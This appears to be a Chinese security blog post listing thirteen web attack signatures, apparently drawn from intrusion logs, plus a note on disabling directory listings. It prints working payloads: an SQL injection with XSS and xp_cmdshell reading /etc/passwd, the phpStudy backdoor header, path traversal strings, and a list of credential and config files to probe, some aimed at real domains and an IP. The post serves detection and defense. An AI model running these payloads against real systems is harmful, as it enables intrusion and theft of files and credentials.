• 主页
  • 相册
  • 随笔
  • 目录
  • 存档
Total 244
Search AboutMe

  • 主页
  • 相册
  • 随笔
  • 目录
  • 存档

信安小知识-6

2021-10-12

1. Sqlmap space2blank Tamper(特殊空字符)

1
Location: https://www.mct.gov.cn/this_is_404_page?waf_detect=value+AND+1=1+UNION+ALL+SELECT+1,NULL,'<script>alert("XSS")</script>',table_name+FROM+information_schema.tables+WHERE+2>1--/**/;+EXEC+xp_cmdshell('cat+../../../etc/passwd')#\

2. GIT项目源代码探测

1
http://www.caeg.cn/.git/HEAD

3. 目录穿越攻击行为

1
2
3
4
temp=/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows/
.shtml/../../xhtml/css/index.css

[%2F == /]

4. Nmap扫描

1
/nice ports,/Trinity.txt.bak

5. PhpStudy后门远程命令执行

1
2
3
Accept-Charset: ZGllKG1kNSgnSGVsbG9waHBTdHVkeScpKTs=

die(md5('HellophpStudy'));

6. Whatweb扫描行为

1
User-Agent: WhatWeb/0.5.2

7. 系统/服务配置不当

1
1、如果必须开启该目录的目录列表功能,则应对该目录下的文件进行详细检查,确保不包含敏感文件。2、如非必要,请重新配置WEB服务器,禁止该目录的自动目录列表功能。附:1.Apache禁止列目录:方法一,修改httpd.conf配置文件,查找OptionsIndexesFollowSymLinks,修改为Options-Indexes;方法二,在www目录下的修改.htaccess配置文件,加入Options-Indexes。(推荐)2.Tomcat禁止列目录:在Tomcat的conf/web.xml文件里把listings值改为false。PS:修改完httpd.conf后,一定记得重启web服务,才能生效噢!1.IIS禁止列目录方法一,在网站目录上右键点“属性”然后找到“主目录”,将“目录浏览”前的勾去掉即可,如下图方法二,若要启用或禁用目录浏览,请使用下面的语法:appcmdsetconfig/section:directoryBrowse/enabled:true|false默认情况下,enabled属性设置为true,这表示目录浏览已启用。将enabled属性设置为false时,就会禁用目录浏览。例如,若要禁用目录浏览,请在命令提示符处键入如下命令,然后按Enter:appcmdsetconfig/section:directoryBrowse/enabled:false

8. Apache Shiro <= 1.2.4反序列化漏洞攻击(CVE-2016-4437)

1
通常情况下,远程代码执行漏洞包括: (1)URL提交,主要是GET、POST请求; (2)构造特定的HTTP请求; (3)利用一些框架底层的安全漏洞,执行任意代码; 远程代码执行漏洞可带来如下危害: (1)攻击者可通过此漏洞创建恶意脚本文件,对服务器的正常运行造成安全威胁; (2)黑客可在服务器上执行任意脚本命令,写入后门,从而入侵服务器,获取服务器的管理员权限,危害巨大。

9. WebServer文件解析漏洞攻击

1
WebServer在处理请求中asp扩展名时,通过上传asp代码的图片文件访问xxx.asp;x.jpg来执行其中的代码;

10. 信息泄露攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
db.sql

db.sqlite

config.php.bak

config.ini

config.inc

id_rsa

phpinfo.php

.bash_profile

.htpasswd.bak

.user.ini

.svn/entries

.ssh/id_rsa

/../../../../../../../../../../../../../../../../etc/passwd

11. 文件下载过滤

1
2
3
114.255.59.102/api.php?c=project&f=index&id=news&sort=1+and+extractvalue(1,concat(~,md5(915401131)))+--+&token=1234

GET /vpn/../vpns/cfg/smb.conf

12. Apache畸形本地文件名安全绕过漏洞

1
Apache服务器从右至左判断文件后缀名,假如文件名为filename.x1.x2.x3,则先判断x3是否文件后缀名,然后x2,x1直到发现有效后缀名。这导致像test.php.x1.x2.x3这样的文件被识别为test.php,即,攻击者创建类似于*.php.*,的文件名,上传至服务器即可利用该漏洞运行脚本

13. Apache Tomcat AllowLinking URIencoding目录遍历漏洞

1
GET /%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passw
  • sec
  • Security
  • Web Security
  • Note
阿斯伯格综合征特征与纠正
西行漫记-其四
  1. 1. 1. Sqlmap space2blank Tamper(特殊空字符)
  2. 2. 2. GIT项目源代码探测
  3. 3. 3. 目录穿越攻击行为
  4. 4. 4. Nmap扫描
  5. 5. 5. PhpStudy后门远程命令执行
  6. 6. 6. Whatweb扫描行为
  7. 7. 7. 系统/服务配置不当
  8. 8. 8. Apache Shiro <= 1.2.4反序列化漏洞攻击(CVE-2016-4437)
  9. 9. 9. WebServer文件解析漏洞攻击
  10. 10. 10. 信息泄露攻击
  11. 11. 11. 文件下载过滤
  12. 12. 12. Apache畸形本地文件名安全绕过漏洞
  13. 13. 13. Apache Tomcat AllowLinking URIencoding目录遍历漏洞
© 2024 何决云 载入天数...